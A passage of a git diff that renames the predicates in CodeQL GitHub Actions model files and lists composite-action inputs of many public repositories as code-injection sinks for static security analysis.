diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59ef..2d4108331b91 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f7458..ccd49962fa4b 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed4..a7e56c8626d0 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c346615..4c0df425e458 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e5..a69f2303dbe4 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e6..c2c87969e936 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119aea..c1c3bf433cdc 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0f..af21dca82055 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f2..18fdeffe1ec2 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d53..ee67e8821744 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc553..49caeb5f1dcf 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed202348..dda74b285da7 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef9..4b144103f8fb 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730abe..931658c0bb5e 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa1..f29632176626 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8e..1578e397369d 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63e..17c45e0d8edd 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c8..4e26b8728001 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b27215..d5fa53d1bbb3 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb220058..f90fb1c5e63e 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c896..d16c0792c6da 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4d..4d009c2d47db 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05db..afd875c22057 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31dbf..680bbe27bcb4 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c0..ffe074d3dea9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54b..e53a58412c9e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c6..a899f727e395 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b7959812..0c7c2e1bded6 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10f..3d631e60dc37 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3dc..2f8710d2cbd0 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da836..5490e62cdc91 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a07514..0c6df201a1c9 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf20..7d0b894f35d8 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3bb..d85418c7a41e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e8..074cf066e373 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c46365..c4497b59af8e 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1a..cc28e15a55b0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e5..76fb41dadf10 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019e..b786a672140d 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d47..236ac8f2cd21 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9faf..64207dbca6ab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e83..46de0ff86c67 100644 
--- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b982257211..a07b223777b0 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb113..e3470982f53d 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab904..87535288d265 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1ad..28249c824287 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e9..8d1bbce631fc 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb35..3c5f85a6e79e 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
